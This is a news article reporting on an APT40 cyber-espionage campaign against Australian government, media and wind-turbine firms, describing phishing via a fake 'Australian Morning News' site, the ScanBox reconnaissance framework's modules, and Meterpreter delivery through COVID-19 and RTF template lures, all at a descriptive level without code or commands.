Chinese Hackers Strike Down Under
Phishing Scam Derails Australian Government
According to the Australian government, Chinese hackers have begun to target Australian agencies and wind turbine fleets in the South China Sea. In this specific campaign, individuals that met certain criteria were directed to a fake Australian news media outlet via phishing emails. They then went on to receive a malicious JavaScript payload through the ScanBox reconnaissance framework.
The campaign ran from April to June of this year, directed at employees of regional and national Australian government departments, local and international news media outlets, and companies that maintain and monitor the wind turbines in the South China Sea.
According to security analysts at PricewaterhouseCoopers and Proofpoint, the campaign was concocted as a means of cyber espionage on the Australian government. As a result of studying the nature of the attack, they have reason to believe that the APT40 Group, based in China, is responsible for the hack. The group is also known as Red Ladon, Leviathan, and TA423.
Fake “Australian Morning News”
At least six Chinese-affiliated hackers have used SscanBox in several hacks in the past, with enough veritable evidence concluding that the toolkit has been in use since 2014, the earliest. Based on further investigation, the hackers included a URL to the malicious website, while posing as an employee of a fictitious media outlet, “Australian Morning News.” The website featured content that was plagiarized from legitimate news websites.
Despite leading to the same page and malicious payload each time, the researchers claim that the URLs also contained specific values for each victim. Selective plugin loading was used as it would reduce the likelihood of crashes and failures and attract cyber security researchers’ attention.
The ScanBox framework included modules such as the Keylogger, which logs keystrokes made inside a ScanBox iframe, identification of installed browser plugins, browser fingerprinting which allows identifying and evaluating the technological capabilities of the victim’s browser, webRTC implementation for peer-to-peer real-time communication using APIs. Lastly, the malware verifies whether or not Kaspersky security software is present on the victim’s computer.
Once all criteria are met, the framework begins delivering the victim’s profile information, technical specifications, and information helpful for reconnaissance and basic espionage after the victim’s computer has been compromised and the chosen plugins have been installed.
Covid19 Passport Services Hack
In some instances seen in June 2022, hackers used COVID-19 passport services lures that downloaded a DLL stager for loading Meterpreter to attack the Australian Naval Defense, oil and petroleum, and deep water drilling enterprises. Later on, Proofpoint assessed that the 2022 campaign was the third phase of the same intelligence-gathering effort that APT40 has been conducting since March 2021, based on current evidence from targeting tactics and tools.
The hackers then pretend to be journalists from publications like “The Australian” and “Herald Sun,” performing RTF Template injection and installing Meterpreter on the victims’ computers. Since 2018, cyber analysts saw the continued use of ScanBox in APT40 hacking activities.
